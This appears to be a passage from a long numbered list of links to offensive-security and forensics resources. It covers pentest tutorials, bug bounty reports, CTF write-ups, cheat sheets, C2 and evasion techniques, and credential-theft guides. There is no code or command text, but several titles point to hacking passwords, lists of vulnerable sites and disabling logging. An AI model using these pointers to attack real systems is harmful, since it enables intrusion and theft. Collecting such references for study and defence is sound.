https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/ -644-Hijacking extensions handlers as a malware persistence method: https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/ -645-I'll Get Your Credentials ... Later!: https://www.fuzzysecurity.com/tutorials/18.html -646-Game Over: CanYouPwnMe > Kevgir-1: https://www.fuzzysecurity.com/tutorials/26.html -647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities: http://www.greyhathacker.net/?p=995 -648-Getting started in Bug Bounty: https://medium.com/p/7052da28445a -649-Union SQLi Challenges (Zixem Write-up): https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60 -650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites: https://gbhackers.com/scanless-port-scans-websites-behalf -651-WEBAPP PENTEST: https://securityonline.info/category/penetration-testing/webapp-pentest/ -652-Cross-Site Scripting (XSS) Payloads: https://securityonline.info/tag/cross-site-scripting-xss-payloads/ -653-sg1: swiss army knife for data encryption, exfiltration & covert communication: https://securityonline.info/tag/sg1/ -654-NETWORK PENTEST: https://securityonline.info/category/penetration-testing/network-pentest/ -655-SQL injection in an UPDATE query - a bug bounty story!: https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html -656-Cross-site Scripting: https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ -657-Local File Inclusion: https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ -658-Command Injection: https://www.netsparker.com/blog/web-security/command-injection-vulnerability/ -659-a categorized list of Windows CMD commands: https://ss64.com/nt/commands.html -660-Understanding Guide for Nmap Timing Scan (Firewall Bypass): http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass -661-RFID Hacking with The Proxmark 3: https://blog.kchung.co/tag/rfid/ -662-A practical guide to RFID badge copying: https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying -663-Denial of Service using Cookie Bombing: https://medium.com/p/55c2d0ef808c -664-Vultr Domain Hijacking: https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking -665-Command and Control: https://vincentyiu.co.uk/red-team/domain-fronting -666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers: https://gbhackers.com/cisco-global-exploiter-cge -667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -668-Situational Awareness: https://pentestlab.blog/2018/05/28/situational-awareness/ -669-Unquoted Service Path: https://pentestlab.blog/2017/03/09/unquoted-service-path -670-NFS: https://pentestacademy.wordpress.com/2017/09/20/nfs/ -671-List of Tools for Pentest Rookies: https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/ -672-Common Windows Commands for Pentesters: https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/ -673-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -674-OSINT x UCCU Workshop on Open Source Intelligence: https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence -675-Advanced Attack Techniques: https://www.cyberark.com/threat-research-category/advanced-attack-techniques/ -676-Credential Theft: https://www.cyberark.com/threat-research-category/credential-theft/ -678-The Cloud Shadow Admin Threat: 10 Permissions to Protect: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ -679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk: https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/ -680-Weakness Within: Kerberos Delegation: https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/ -681-Simple Domain Fronting PoC with GAE C2 server: https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/ -682-Find Critical Information about a Host using DMitry: https://www.thehackr.com/find-critical-information-host-using-dmitry/ -683-How To Do OS Fingerprinting In Kali Using Xprobe2: http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA -684-Crack SSH, FTP, Telnet Logins Using Hydra: https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/ -685-Reveal Saved Passwords in Browser using JavaScript Injection: https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/ -686-Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf -687-Manual Post Exploitation on Windows PC (Network Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command -688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool: http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool -689-Hack Locked Workstation Password in Clear Text: http://www.hackingarticles.in/hack-locked-workstation-password-clear-text -690-How to Find ALL Excel, Office, PDF, and Images in Remote PC: http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc -691-red-teaming: https://www.redteamsecure.com/category/red-teaming/ -692-Create a Fake AP and Sniff Data mitmAP: http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/ -693-Bruteforcing From Nmap Output BruteSpray: http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/ -694-Reverse Engineering Framework radare2: http://www.uaeinfosec.com/reverse-engineering-framework-radare2/ -695-Automated ettercap TCP/IP Hijacking Tool Morpheus: http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/ -696-List Of Vulnerable SQL Injection Sites: https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199 -697-Command and Control – Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/ -698-Command and Control – DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ -699-Skeleton Key: https://pentestlab.blog/2018/04/10/skeleton-key/ -700-Secondary Logon Handle: https://pentestlab.blog/2017/04/07/secondary-logon-handle -701-Hot Potato: https://pentestlab.blog/2017/04/13/hot-potato -702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -703-Linux-Kernel-exploits: http://tacxingxing.com/category/exploit/kernel-exploit/ -704-Linux-Kernel-Exploit Stack Smashing: http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/ -705-Linux Kernel Exploit Environment: http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/ -706-Linux-Kernel-Exploit NULL dereference: http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/ -707-Apache mod_python for red teams: https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/ -708-Bounty Write-up (HTB): https://medium.com/p/9b01c934dfd2/ 709-CTF Writeups: https://medium.com/ctf-writeups -710-Detecting Malicious Microsoft Office Macro Documents: http://www.greyhathacker.net/?p=872 -711-SQL injection in Drupal: https://hackerone.com/reports/31756 -712-XSS and open redirect on Twitter: https://hackerone.com/reports/260744 -713-Shopify login open redirect: https://hackerone.com/reports/55546 -714-HackerOne interstitial redirect: https://hackerone.com/reports/111968 -715-Ubiquiti sub-domain takeovers: https://hackerone.com/reports/181665 -716-Scan.me pointing to Zendesk: https://hackerone.com/reports/114134 -717-Starbucks' sub-domain takeover: https://hackerone.com/reports/325336 -718-Vine's sub-domain takeover: https://hackerone.com/reports/32825 -719-Uber's sub-domain takeover: https://hackerone.com/reports/175070 -720-Read access to Google: https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ -721-A Facebook XXE with Word: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/ -722-The Wikiloc XXE: https://www.davidsopas.com/wikiloc-xxe-vulnerability/ -723-Uber Jinja2 TTSI: https://hackerone.com/reports/125980 -724-Uber Angular template injection: https://hackerone.com/reports/125027 -725-Yahoo Mail stored XSS: https://klikki.fi/adv/yahoo2.html -726-Google image search XSS: https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html -727-Shopify Giftcard Cart XSS : https://hackerone.com/reports/95089 -728-Shopify wholesale XSS : https://hackerone.com/reports/106293 -729-Bypassing the Shopify admin authentication: https://hackerone.com/reports/270981 -730-Starbucks race conditions: https://sakurity.com/blog/2015/05/21/starbucks.html -731-Binary.com vulnerability – stealing a user's money: https://hackerone.com/reports/98247 -732-HackerOne signal manipulation: https://hackerone.com/reports/106305 -733-Shopify S buckets open: https://hackerone.com/reports/98819 -734-HackerOne S buckets open: https://hackerone.com/reports/209223 -735-Bypassing the GitLab 2F authentication: https://gitlab.com/gitlab-org/gitlab-ce/issues/14900 -736-Yahoo PHP info disclosure: https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ -737-Shopify for exporting installed users: https://hackerone.com/reports/96470 -738-Shopify Twitter disconnect: https://hackerone.com/reports/111216 -739-Badoo full account takeover: https://hackerone.com/reports/127703 -740-Disabling PS Logging: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs -741-macro-less-code-exec-in-msword: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ -742-5 ways to Exploiting PUT Vulnerability: http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit -743-5 Ways to Exploit Verb Tempering Vulnerability: http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability -744-5 Ways to Hack MySQL Login Password: http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password -745-5 Ways to Hack SMB Login Password: http://www.hackingarticles.in/5-ways-to-hack-smb-login-password -746-6 Ways to Hack FTP Login Password: http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password -746-6 Ways to Hack SNMP Password: http://www.hackingarticles.in/6-ways-to-hack-snmp-password -747-6 Ways to Hack VNC Login Password: http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password -748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter: http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter -749-Beginner Guide to IPtables: http://www.hackingarticles.in/beginner-guide-iptables -750-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -751-Exploit Remote Windows 10 PC using Discover Tool: http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool -752-Forensics Investigation of Remote PC (Part 2): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2 -753-5 ways to File upload vulnerability Exploitation: http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation -754-FTP Penetration Testing in Ubuntu (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21 -755-FTP Penetration Testing on Windows (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-windows -756-FTP Pivoting through RDP: http://www.hackingarticles.in/ftp-pivoting-rdp -757-Fun with Metasploit Payloads: http://www.hackingarticles.in/fun-metasploit-payloads -758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc -759-Generating Reverse Shell using Msfvenom (One Liner Payload): http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload -760-Generating Scan Reports Using Nmap (Output Scan): http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan -761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled): http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled -762-Hack ALL Security Features in Remote Windows 7 PC: http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc -763-5 ways to Exploit LFi Vulnerability: http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability -764-5 Ways to Directory Bruteforcing on Web Server: http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server -765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit -766-Hack Gmail and Facebook Password in Network using Bettercap: http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap -767-ICMP Penetration Testing: http://www.hackingarticles.in/icmp-penetration-testing -768-Understanding Guide to Mimikatz: http://www.hackingarticles.in/understanding-guide-mimikatz -769-5 Ways to Create Dictionary for Bruteforcing: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing -770-Linux Privilege Escalation using LD_Preload: http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ -771-2 Ways to Hack Remote Desktop Password using kali Linux: http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux -772-2 ways to use Msfvenom Payload with Netcat: http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat -773-4 ways to Connect Remote PC using SMB Port: http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port -774-4 Ways to DNS Enumeration: http://www.hackingarticles.in/4-ways-dns-enumeration -775-4 Ways to get Linux Privilege Escalation: http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation -776-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -777-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -778-OSINT Cheat Sheet: https://hack2interesting.com/osint-cheat-sheet/ -779-OSINT Cheat Sheet: https://infoskirmish.com/osint-cheat-sheet/ -780-OSINT Links for Investigators: https://i-sight.com/resources/osint-links-for-investigators/ -781- Metasploit Cheat Sheet : https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html -782- Exploit Development Cheat Sheet: https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4 -783-Building Profiles for a Social Engineering Attack: https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/ -784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html -785-Getting the goods with CrackMapExec: Part 2: https://byt3bl33d3r.github.io/tag/crackmapexec.html -786-Bug Hunting Methodology (part-1): https://medium.com/p/91295b2d2066 -787-Exploring Cobalt Strike's ExternalC2 framework: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ -788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities: https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/ -789-Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page -790-Bug Bounty — Tips / Tricks / JS (JavaScript Files): https://medium.com/p/bdde412ea49d -791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition): https://medium.com/p/f88a9f383fcc -792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution: https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/ -795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ -800-Capcom Rootkit Proof-Of-Concept: https://www.fuzzysecurity.com/tutorials/28.html -801-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -802-Beginners Guide for John the Ripper (Part 1): http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -803-Working of Traceroute using Wireshark: http://www.hackingarticles.in/working-of-traceroute-using-wireshark/ -804-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/ -805-4 ways to SMTP Enumeration: http://www.hackingarticles.in/4-ways-smtp-enumeration -806-4 ways to Hack MS SQL Login Password: http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password -807-4 Ways to Hack Telnet Passsword: http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword -808-5 ways to Brute Force Attack on WordPress Website: http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website -809-5 Ways to Crawl a Website: http://www.hackingarticles.in/5-ways-crawl-website -810-Local Linux Enumeration & Privilege Escalation Cheatsheet: https://www.rebootuser.com/?p=1623 -811-The Drebin Dataset: https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html -812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else: https://www.slideshare.net/x00mario/es6-en -813-IT and Information Security Cheat Sheets: https://zeltser.com/cheat-sheets/ -814-Cheat Sheets - DFIR Training: https://www.dfir.training/cheat-sheets -815-WinDbg Malware Analysis Cheat Sheet: https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -819-Cheat Sheet for Analyzing Malicious Software: https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/ -820-Analyzing Malicious Documents Cheat Sheet - Prodefence: https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/ -821-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -823-Windows Registry Auditing Cheat Sheet: https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology -824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know: https://kennyvn.com/cheatsheet-useful-bash-commands-linux/ -825-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition): https://securedyou.com/best-kali-linux-commands-terminal-hacking/ -827-Kali Linux Commands Cheat Sheet: https://www.pinterest.com/pin/393431717429496576/ -827-Kali Linux Commands Cheat Sheet A To Z: https://officialhacker.com/linux-commands-cheat-sheet/ -828-Linux commands CHEATSHEET for HACKERS: https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/ -829-100 Linux Commands – A Brief Outline With Cheatsheet: https://fosslovers.com/100-linux-commands-cheatsheet/ -830-Kali Linux – Penetration Testing Cheat Sheet: https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/ -831-Basic Linux Terminal Shortcuts Cheat Sheet : https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/ -832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} : https://itechhacks.com/kali-linux-and-linux-commands/ -833-Transferring files from Kali to Windows (post exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux: https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet -835-What is penetration testing? 10 hacking tools the pros use: https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html -836-Best Hacking Tools List for Hackers & Security Professionals in 2019: https://gbhackers.com/hacking-tools-list/ -837-ExploitedBunker PenTest Cheatsheet: https://exploitedbunker.com/articles/pentest-cheatsheet/ -838-How to use Zarp for penetration testing: https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/ -839-Wireless Penetration Testing Cheat Sheet; https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ -840-Pentest Cheat Sheets: https://www.cheatography.com/tag/pentest/ -841-40 Best Penetration Testing (Pen Testing) Tools in 2019: https://www.guru99.com/top-5-penetration-testing-tools.html -842-Metasploit Cheat Sheet: https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -843-OSCP useful resources and tools; https://acknak.fr/en/articles/oscp-tools/ -844-Pentest + Exploit dev Cheatsheet: https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/ -845-What is Penetration Testing? A Quick Guide for 2019: https://www.cloudwards.net/penetration-testing/ -846-Recon resource: https://pentester.land/cheatsheets/2019/04/15/recon-resources.html -847-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -848-Recon Cheat Sheets: https://www.cheatography.com/tag/recon/ -849-Penetration Testing Active Directory, Part II: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ -850-Reverse-engineering Cheat Sheets: https://www.cheatography.com/tag/reverse-engineering/ -851-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows -853-PROPagate: http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/ -854-Process Doppelgänging, by Tal Liberman and Eugene Kogan:: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf -855-Gargoyle: https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html -856-GHOSTHOOK: https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/ -857-Learn C: https://www.programiz.com/c-programming -858-x86 Assembly Programming Tutorial: https://www.tutorialspoint.com/assembly_programming/ -859-Dr. Paul Carter's PC Assembly Language: http://pacman128.github.io/pcasm/ -860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration: http://opensecuritytraining.info/IntroX86.html -861-x86 Disassembly: https://en.wikibooks.org/wiki/X86_Disassembly -862-use-of-dns-tunneling-for-cc-communications-malware: https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ -863-Using IDAPython to Make Your Life Easier (Series):: https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/ -864-NET binary analysis: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/ -865-detailed analysis of the BlackEnergy3 big dropper: https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/ -866-detailed analysis of Uroburos rootkit: https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg -867-TCP/IP and tcpdump Pocket Reference Guide: https://www.sans.org/security-resources/tcpip.pdf -868-TCPDUMP Cheatsheet: http://packetlife.net/media/library/12/tcpdump.pdf -869-Scapy Cheatsheet: http://packetlife.net/media/library/36/scapy.pdf -870-WIRESHARK DISPLAY FILTERS: http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf -871-Windows command line sheet: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf -872-Metasploit cheat sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf -873-IPv6 Cheatsheet: http://packetlife.net/media/library/8/IPv6.pdf -874-IPv4 Subnetting: http://packetlife.net/media/library/15/IPv4_Subnetting.pdf -875-IOS IPV4 ACCESS LISTS: http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf -876-Common Ports List: http://packetlife.net/media/library/23/common_ports.pdf -877-WLAN: http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf -878-VLANs Cheatsheet: http://packetlife.net/media/library/20/VLANs.pdf -879-VoIP Basics CheatSheet: http://packetlife.net/media/library/34/VOIP_Basics.pdf -880-Google hacking and defense cheat sheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf -881-Nmap CheatSheet: https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0 -882-Netcat cheat sheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf -883-PowerShell cheat sheet: https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf -884-Scapy cheat sheet POCKET REFERENCE: https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf -885-SQL injection cheat sheet.: https://information.rapid7.com/sql-injection-cheat-sheet-download.html -886-Injection cheat sheet: https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html -887-Symmetric Encryption Algorithms cheat sheet: https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/ -888-Intrusion Discovery Cheat Sheet v2.0 for Linux: https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf -889-Intrusion Discovery Cheat Sheet v2.0 for Window: https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf -890-Memory Forensics Cheat Sheet v1.2: https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf -891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH: https://www.sans.org/brochure/course/log-management-in-depth/6 -892-Evidence collection cheat sheet: https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf -893-Hex file and regex cheat sheet v1.0: https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf -894-Rekall Memory Forensic Framework Cheat Sheet v1.2.: https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf -895-SIFT WORKSTATION Cheat Sheet v3.0.: https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf -896-Volatility Memory Forensic Framework Cheat Sheet: https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf -897-Hands - on Network Forensics.: https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf -898-VoIP Security Vulnerabilities.: https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036 -899-Incident Response: How to Fight Back: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342 -900-BI-7_VoIP_Analysis_Fundamentals: https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf -901-Bug Hunting Guide: cybertheta.blogspot.com/2018/08/bug-hunting-guide.html -902-Guide 001 |Getting Started in Bug Bounty Hunting: https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun... -903-SQL injection cheat sheet : https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet -904-RSnake's XSS Cheat Sheet: https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/ -905-Bug Bounty Tips (2): https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/ -906-A Review of my Bug Hunting Journey: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ -907-Meet the First Hacker Millionaire on HackerOne: https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/ -908-XSS Cheat Sheet: https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/ -909-Bug Bounty Hunter Methodology: https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016 -910-#10 Rules of Bug Bounty: https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c -911-Bugbounty Checklist: https://www.excis3.be/bugbounty-checklist/21/ -912-FireBounty | The Ultimate Bug Bounty List!: https://firebounty.com/ -913-Brutelogic xss cheat sheet 2019: https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/ -914-XSS Cheat Sheet by Rodolfo Assis: https://leanpub.com/xss -915-Cross-Site-Scripting (XSS) – Cheat Sheet: https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/ -916-XSS Cheat Sheet V. 2018 : https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/ -917-Cross-site Scripting Payloads Cheat Sheet : https://exploit.linuxsec.org/xss-payloads-list -918-Xss Cheat Sheet : https://www.in-secure.org/tag/xss-cheat-sheet/ -919-Open Redirect Cheat Sheet : https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html -920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet: https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php -921-XSS Cheat Sheet: https://tools.paco.bg/13/ -922-XSS for ASP.net developers: https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers -923-Cross-Site Request Forgery Cheat Sheet: https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ -924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet : https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee... -926-Guide to CSRF (Cross-Site Request Forgery): https://www.veracode.com/security/csrf 